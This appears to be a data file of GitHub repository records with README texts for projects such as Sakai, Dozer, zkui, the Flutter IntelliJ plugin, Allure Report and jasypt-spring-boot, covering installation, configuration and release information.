-These versions are actively supported by the community. - -Sakai 23.1 ([release](http://source.sakaiproject.org/release/23.1/) | [fixes](https://confluence.sakaiproject.org/display/DOC/23.1+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+23+Release+Notes)) - -Sakai 22.4 ([release](http://source.sakaiproject.org/release/22.4/) | [fixes](https://confluence.sakaiproject.org/display/DOC/22.4+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+22+Release+Notes)) - -## Previous community versions which are no longer supported -These versions are no longer supported by the community and will only receive security changes. - -Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes)) - -Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes)) - -Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes)) - -Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes)) - -Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/)) - -For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list). - -## Under Development - -[Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024. - -[Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024. - -## Accessibility -[The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification. - -CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you. - -## Skinning Sakai -Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library - -## Translating Sakai - -Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you. - -From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below. - -### Supported languages -| Locale | Language| -| ------ | ------ | -| en_US | English (Default) | -| ca_ES | Catalán | -| de_DE | German | -| es_ES | Español | -| eu | Euskera | -| fa_IR | Farsi | -| fr_FR | Français | -| hi_IN | Hindi | -| ja_JP | Japanese | -| mn | Mongolian | -| pt_BR | Portuguese (Brazil) | -| sv_SE | Swedish | -| tr_TR | Turkish | -| zh_CN | Chinese | -| ar | Arabic | -| ro_RO | Romanian | -| bg | Bulgarian | -| sr | Serbian | - -### Other languages - -Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs). - -## Community (contrib) tools -A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after! - - -",0 -qiurunze123/miaosha,⭐⭐⭐⭐秒杀系统设计与实现.互联网工程师进阶与分析🙋🐓,2018-09-14T04:36:24Z,,"![互联网 Java 秒杀系统设计与架构](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png) - -> 朋友们,感谢大家对我文章的支持。时间过得很快, -这部分内容还是我几年前刚毕业时写的,而且也只是个人项目,被公众号文章给我一顿喷,博主内容我也看了,晚上回到家就简单的回复下, -想了一下,因为确实没精力维护,对于小白会造成误导,决定下线这个项目,这是我的第一个项目,就让他成回忆吧!以免对自己造成困扰! -大家以后还是可以微信交流其它问题,有时间也会为大家解答! - ->1.理性看待 - -我本意是将一些自己的思路和方向表达出来,因为star的激增,我也就做了最初的一版规划,那时候刚毕业没多久,很荣幸这个项目从一个小项目扩张成了大项目,但也都是一些当时不成熟的想法 ,项目没有完全完成, -也只是自己练手的入门级项目,旨在学习更多的知识,所有大家在看到这个项目的时候要有更多自己的思考和过滤,不要一味的照搬照抄!最后那些不理性的同学,给大家推荐俩本书 《我就是你啊》和《非暴力沟通》没准可以让你进化! -",0 -ag2s20150909/TTS,,2021-05-09T07:38:35Z,,,0 -DozerMapper/dozer,Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another. ,2012-01-23T21:11:58Z,,"[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml) -[![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core) -[![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]() - -# Dozer - -## Project Activity -The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer -on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating -onto another library, such as: -- [mapstruct](https://github.com/mapstruct/mapstruct) -- [modelmapper](https://github.com/modelmapper/modelmapper) - -For those moving to mapstruct, the community has created a [Intellij plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration. - -## Why Map? -A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects). - -Mapping between data objects has traditionally been addressed by hand coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data object. - -This type of code for such conversions is rather boring to write, so why not do it automatically? - - -## What is Dozer? -Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another, it is an open source mapping framework that is robust, generic, flexible, reusable, and configurable. - -Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level. - -Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration. - -## Getting Started -Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information. - -## Getting the Distribution -If you are using Maven, simply copy-paste this dependency to your project. - -```XML - - com.github.dozermapper - dozer-core - 7.0.0 - -``` - -## Simple Example -```XML - - yourpackage.SourceClassName - yourpackage.DestinationClassName - - yourSourceFieldName - yourDestinationFieldName - - -``` - -```Java -SourceClassName sourceObject = new SourceClassName(); -sourceObject.setYourSourceFieldName(""Dozer""); - -Mapper mapper = DozerBeanMapperBuilder.buildDefault(); -DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class); - -assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName())); -``` -",0 -DeemOpen/zkui,A UI dashboard that allows CRUD operations on Zookeeper.,2014-05-22T06:15:53Z,,"zkui - Zookeeper UI Dashboard -==================== -A UI dashboard that allows CRUD operations on Zookeeper. - -Requirements -==================== -Requires Java 7 to run. - -Setup -==================== -1. mvn clean install -2. Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are coma separated. eg: server1:2181,server2:2181. First server should always be the leader. -3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & ) -4. http://localhost:9090 - -Login Info -==================== -username: admin, pwd: manager (Admin privileges, CRUD operations supported) -username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported) - -You can change this in the config.cfg - -Technology Stack -==================== -1. Embedded Jetty Server. -2. Freemarker template. -3. H2 DB. -4. Active JDBC. -5. JSON. -6. SLF4J. -7. Zookeeper. -8. Apache Commons File upload. -9. Bootstrap. -10. Jquery. -11. Flyway DB migration. - -Features -==================== -1. CRUD operation on zookeeper properties. -2. Export properties. -3. Import properties via call back url. -4. Import properties via file upload. -5. History of changes + Path specific history of changes. -6. Search feature. -7. Rest API for accessing Zookeeper properties. -8. Basic Role based authentication. -9. LDAP authentication supported. -10. Root node /zookeeper hidden for safety. -11. ACL supported global level. - -Import File Format -==================== -# add property -/appconfig/path=property=value -# remove a property --/path/property - -You can either upload a file or specify a http url of the version control system that way all your zookeeper changes will be in version control. - -Export File Format -==================== -/appconfig/path=property=value - -You can export a file and then use the same format to import. - -SOPA/PIPA BLACKLISTED VALUE -==================== -All password will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login. -Password will be not shown on search / export / view for normal user. -For a property to be eligible for black listing it should have (PWD / pwd / PASSWORD / password) in the property name. - -LDAP -==================== -If you want to use LDAP authentication provide the ldap url. This will take precedence over roleSet property file authentication. -ldapUrl=ldap://:/dc=mycom,dc=com -If you dont provide this then default roleSet file authentication will be used. - -REST call -==================== -A lot of times you require your shell scripts to be able to read properties from zookeeper. This can now be achieved with a http call. Password are not exposed via rest api for security reasons. The rest call is a read only operation requiring no authentication. - -Eg: -http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com -This will first lookup the host name under /appconfig/hosts and then find out which path the host point to. Then it will look for the property under that path. - -There are 2 additional properties that can be added to give better control. -cluster=cluster1 -http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com -In this case the lookup will happen on lookup path + cluster1. - -app=myapp -http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com -In this case the lookup will happen on lookup path + myapp. - -A shell script will call this via -MY_PROPERTY=""$(curl -f -s -S -k ""http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`"" | cut -d '=' -f 2)"" -echo $MY_PROPERTY - -Standardization -==================== -Zookeeper doesnt enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup. -Each server/box has its hostname listed under /appconfig/hosts and that points to the path where properties reside for that path. So when the lookup for a property occurs over a rest call it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned. -eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1 -This means that when myserver.com tries to lookup the propery it looks under /appconfig/dev/app1 - -You can also append app name to make lookup easy. -eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1 -eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1 - -Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootloader entry looks like this /appconfig/hosts/myserver.com=/appconfig/dev the rest lookup happens on the following paths. -/appconfig/dev/.. -/appconfig/dev/hostname.. -/appconfig/dev/app.. -/appconfig/dev/cluster.. -/appconfig/dev/cluster/app.. - -This standardization is only needed if you choose to use the rest lookup. You can use zkui to update properties in general without worry about this organizing structure. - -HTTPS -==================== -You can enable https if needed. -keytool -keystore keystore -alias jetty -genkey -keyalg RSA - - -Limitations -==================== -1. ACLs are fully supported but at a global level. - -Screenshots -==================== -Basic Role Based Authentication -
- -
- -Dashboard Console -
- -
- -CRUD Operations -
- -
- -Import Feature -
- -
- -Track History of changes -
- -
- -Status of Zookeeper Servers -
- -
- -License & Contribution -==================== - -ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcomed! - -Thanks to Jozef Krajčovič for creating the logo which has been used in the project. -https://www.iconfinder.com/iconsets/origami-birds -",0 -flutter/flutter-intellij,Flutter Plugin for IntelliJ,2016-07-25T22:31:03Z,,"# Flutter Plugin for IntelliJ - -[![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter) -[![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij) - -An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform -app SDK to help developers and designers build modern apps for iOS, Android and the web. - -## Documentation - -- [flutter.dev](https://flutter.dev) -- [Installing Flutter](https://flutter.dev/docs/get-started/install) -- [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide) - -## Fast development - -Flutter's hot reload helps you quickly and easily experiment, build UIs, add features, -and fix bugs faster. Experience sub-second reload times, without losing state, on emulators, -simulators, and hardware for iOS and Android. - - - -## Quick-start - -A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide): - -- install the [Flutter SDK](https://flutter.dev/docs/get-started/install) -- run `flutter doctor` from the command line to verify your installation -- ensure you have a supported IntelliJ development environment; either: - - the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported) - - the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported) -- open the plugin preferences - - `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select ""Browse repositories…"" -- search for and install the 'Flutter' plugin -- choose the option to restart IntelliJ -- configure the Flutter SDK setting - - `Preferences` on macOS, `File>Settings` on Linux, select `Languages & Frameworks > Flutter`, and set - the path to the root of your flutter repo - -## Filing issues - -Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues) -for Flutter IntelliJ issues. - -- for more general Flutter issues, you should prefer to use the Flutter - [issue tracker](https://github.com/flutter/flutter/issues) -- for more Dart IntelliJ related issues, you can use JetBrains' - [YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20) - -## Known issues - -Please note the following known issues: - -- [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will - read the PATH variable just once on startup. Thus, if you change PATH later to - include the Flutter SDK path, this will not have an affect in IntelliJ until you - restart the IDE. -- If you require network access to go through proxy settings, you will need to set the - `https_proxy` variable in your environment as described in the - [pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall). - (See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).) - -## Dev Channel - -If you like getting new features as soon as they've been added to the code then you -might want to try out the dev channel. It is updated weekly with the latest contents -from the ""master"" branch. It has minimal testing. Set up instructions are in the wiki's -[dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel). -",0 -spring-cloud/spring-cloud-netflix,Integration with Netflix OSS components,2014-07-11T15:46:12Z,,,0 -zouzg/mybatis-generator-gui,mybatis-generator界面工具,让你生成代码更简单更快捷,2016-05-08T22:39:39Z,,"mybatis-generator-gui -============== - -mybatis-generator-gui是基于 [mybatis generator](http://www.mybatis.org/generator/index.html) 开发一款界面工具, 本工具可以使你非常容易及快速生成Mybatis的Java POJO文件及数据库Mapping文件。 - -![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png) - - -![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png) - - -![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png) - -![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png) - - -### 核心特性 -* 按照界面步骤轻松生成代码,省去XML繁琐的学习与配置过程 -* 保存数据库连接与Generator配置,每次代码生成轻松搞定 -* 内置常用插件,比如分页插件 -* 支持OverSSH 方式,通过SSH隧道连接至公司内网访问数据库 -* 把数据库中表列的注释生成为Java实体的注释,生成的实体清晰明了 -* 可选的去除掉对版本管理不友好的注释,这样新增或删除字段重新生成的文件比较过来清楚 -* 目前已经支持Mysql、Mysql8、Oracle、PostgreSQL与SQL Server,暂不对其他非主流数据库提供支持。(MySQL支持的比较好,其他数据库有什么问题可以在issue中反馈) - -### 运行要求(重要!!!) -本工具仅支持Java的2个最新的LTS版本,jdk8和jdk11 -* jdk1.8要求版本在1.8.0.60以上版本 -* Java 11无版本要求 - -### 直接运行(非必须) -推荐使用IDE直接运行,如果需要二进制安装包,可以关注公众号获取二进制安装版,目前支持Windows和MacOS,注意你的JDK是不是1.8,并且版本大于1.8.0.60 - - -### 启动本软件 - -* 方法一:关注微信公众号“搬砖头也要有态度”,回复“GUI”获取下载链接 - - ![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png) - -* 方法二: 自助构建 - - ```bash - git clone https://github.com/zouzg/mybatis-generator-gui - cd mybatis-generator-gui - mvn jfx:jar - cd target/jfx/app/ - java -jar mybatis-generator-gui.jar - ``` - -* 方法三: IDE中运行 - - Eclipse or IntelliJ IDEA中启动, 找到`com.zzg.mybatis.generator.MainUI`类并运行就可以了(主要你的IED运行的jdk版本是否符合要求) - -* 方法四:打包为本地原生应用,双击快捷方式即可启动,方便快捷 - - 如果不想打包后的安装包logo为Java的灰色的茶杯,需要在pom文件里将对应操作系统平台的图标注释放开 - - ```bash - #${project.basedir}/package/windows/mybatis-generator-gui.ico为windows - #${project.basedir}/package/macosx/mybatis-generator-gui.icns为mac - mvn jfx:native - ``` - - 另外需要注意,windows系统打包成exe的话需要安装WiXToolset3+的环境;由于打包后会把jre打入安装包,两个平台均100M左右,体积较大请自行打包;打包后的安装包在target/jfx/native目录下 - -### 注意事项 -* 本自动生成代码工具只适合生成单表的增删改查,对于需要做数据库联合查询的,请自行写新的XML与Mapper; -* 部分系统在中文输入方法时输入框中无法输入文字,请切换成英文输入法; -* 如果不明白对应字段或选项是什么意思的时候,把光标放在对应字段或Label上停留一会然后如果有解释会出现解释; - - -### 文档 -更多详细文档请参考本库的Wiki -* [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide) - - -### 贡献 -目前本工具只是本人项目人使用到了并且觉得非常有用所以把它开源,如果你觉得有用并且想改进本软件,你可以: -* 对于你认为有用的功能,你可以在Issue提,我可以开发的尽量满足 -* 对于有Bug的地方,请按如下方式在Issue中提bug - * 如何重现你的bug,包括你使用的系统,JDK版本,数据库类型及版本 - * 如果有任何的错误截图会更好 - * 如果你是一些常见的数据库连接、软件启动不了等问题,请先仔细阅读上面的文档,再解决不了在下面的QQ群中问(问问题的时候尽量把各种信息都提供好,否则只是几行文字是没有人愿意为你解答的)。 - -### QQ群 -鉴于有的同学可能有一些特殊情况不能使用,我建了一个钉钉群供大家交流,钉钉群号:35412531 (原QQ群已不再提供,QQ不方便打开) - -- - - -Licensed under the Apache 2.0 License - -Copyright 2017 by Owen Zou -",0 -allure-framework/allure2,"Allure Report is a flexible, lightweight multi-language test reporting tool. It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process",2016-05-27T14:06:05Z,,"[license]: http://www.apache.org/licenses/LICENSE-2.0 ""Apache License 2.0"" -[site]: https://allurereport.org/?source=github_allure2 ""Official Website"" -[docs]: https://allurereport.org/docs/?source=github_allure2 ""Documentation"" -[qametaio]: https://qameta.io/?source=Report_GitHub ""Qameta Software"" -[blog]: https://qameta.io/blog ""Qameta Software Blog"" -[Twitter]: https://twitter.com/QametaSoftware ""Qameta Software"" -[twitter-team]: https://twitter.com/QametaSoftware/lists/team/members ""Team"" -[build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml -[build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg -[maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ ""Maven Central"" -[maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat -[release]: https://github.com/allure-framework/allure2/releases/latest ""Latest release"" -[release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat -[CONTRIBUTING.md]: .github/CONTRIBUTING.md -[CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md - -# Allure Report - -[![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors) - -> Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests. - - - -- Learn more about Allure Report at [https://allurereport.org](https://allurereport.org) -- 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report -- ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community -- 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates -- 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community -- 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action - ---- - -## Download - -You can use one of the following ways to get Allure: - -* Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section). -* Using Homebrew: - - ```bash - $ brew install allure - ``` -* For Windows, Allure is available from the [Scoop](http://scoop.sh/) commandline-installer. -To install Allure, download and install Scoop and then execute in the Powershell: - - ```bash - scoop install allure - ``` -## How Allure Report works - -Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems. - -![How Allure Report works](.github/how_allure_works.jpg) - -## Allure TestOps - -[DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps. - -## Contributors - -This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md). - - -",0 -ulisesbocchio/jasypt-spring-boot,Jasypt integration for Spring boot,2015-05-27T14:00:55Z,,"# jasypt-spring-boot -**[Jasypt](http://www.jasypt.org)** integration for Spring boot 2.x and 3.0.0 - -[![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot) -[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot) - - -[![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot) -[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&utm_medium=referral&utm_content=ulisesbocchio/jasypt-spring-boot&utm_campaign=Badge_Grade) -[![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) -[![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) -[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE) -[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot) - -[![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8) - -[![""Buy Me A Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd) - -Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.
-There are 3 ways to integrate `jasypt-spring-boot` in your project: - -- Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment -- Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment -- Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncrytablePropertySource` -## What's new? -### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases) -## What to do First? -Use one of the following 3 methods (briefly explained above): - -1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties): - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot-starter - 3.0.5 - - ``` -2. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations then add this dependency to your project: - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot - 3.0.5 - - ``` - - And then add `@EnableEncryptableProperties` to you Configuration class. For instance: - - ```java - @Configuration - @EnableEncryptableProperties - public class MyApplication { - ... - } - ``` - And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties) - -3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project: - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot - 3.0.5 - - ``` - And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance: - - ```java - @Configuration - @EncryptablePropertySource(name = ""EncryptedProperties"", value = ""classpath:encrypted.properties"") - public class MyApplication { - ... - } - ``` -Conveniently, there's also a `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this: - -```java - @Configuration - @EncryptablePropertySources({@EncryptablePropertySource(""classpath:encrypted.properties""), - @EncryptablePropertySource(""classpath:encrypted2.properties"")}) - public class MyApplication { - ... - } -``` - -Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files - -## Custom Environment -As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way: - -```java -new SpringApplicationBuilder() - .environment(new StandardEncryptableEnvironment()) - .sources(YourApplicationClass.class).run(args); - -``` - -This method would only require using a dependency for `jasypt-spring-boot`. No starter jar dependency is required. This method is useful for early access of encrypted properties on bootstrap. While not required in most scenarios could be useful when customizing Spring Boot's init behavior or integrating with certain capabilities that are configured very early, such as Logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring Properties replacement in `logback-spring.xml` files, using the `springProperty` tag. For instance: - -```xml - - - - - org.postgresql.Driver - jdbc:postgresql://localhost:5432/simple - ${user} - ${password} - - -``` - -This mechanism could be used for instance (as shown) to initialize Database Logging Appender that require sensitive credentials to be passed. -Alternatively, if a custom `StringEncryptor` is needed to be provided, a static builder method is provided `StandardEncryptableEnvironment#builder` for customization (other customizations are possible): - -```java -StandardEncryptableEnvironment - .builder() - .encryptor(new MyEncryptor()) - .build() -``` - -## How everything Works? - -This will trigger some configuration to be loaded that basically does 2 things: - -1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are ""encryption aware"" and detect when properties are encrypted following jasypt's property convention. -2. It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments. - -## Where do I put my encrypted properties? -When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySource contained in the Environment. For instance, using the @PropertySource annotation: - -```java - @SpringBootApplication - @EnableEncryptableProperties - @PropertySource(name=""EncryptedProperties"", value = ""classpath:encrypted.properties"") - public class MyApplication { - ... - } -``` -And your encrypted.properties file would look something like this: - -```properties - secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+) -``` -Now when you do `environment.getProperty(""secret.property"")` or use `@Value(""${secret.property}"")` what you get is the decrypted version of `secret.property`.
-When using METHOD 3 (`@EncryptablePropertySource`) then you can access the encrypted properties the same way, the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly. - -## Password-based Encryption Configuration -Jasypt uses an `StringEncryptor` to decrypt properties. For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.): - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
KeyRequiredDefault Value
jasypt.encryptor.passwordTrue -
jasypt.encryptor.algorithmFalsePBEWITHHMACSHA512ANDAES_256
jasypt.encryptor.key-obtention-iterationsFalse1000
jasypt.encryptor.pool-sizeFalse1
jasypt.encryptor.provider-nameFalseSunJCE
jasypt.encryptor.provider-class-nameFalsenull
jasypt.encryptor.salt-generator-classnameFalseorg.jasypt.salt.RandomSaltGenerator
jasypt.encryptor.iv-generator-classnameFalseorg.jasypt.iv.RandomIvGenerator
jasypt.encryptor.string-output-typeFalsebase64
jasypt.encryptor.proxy-property-sourcesFalsefalse
jasypt.encryptor.skip-property-sourcesFalseempty list
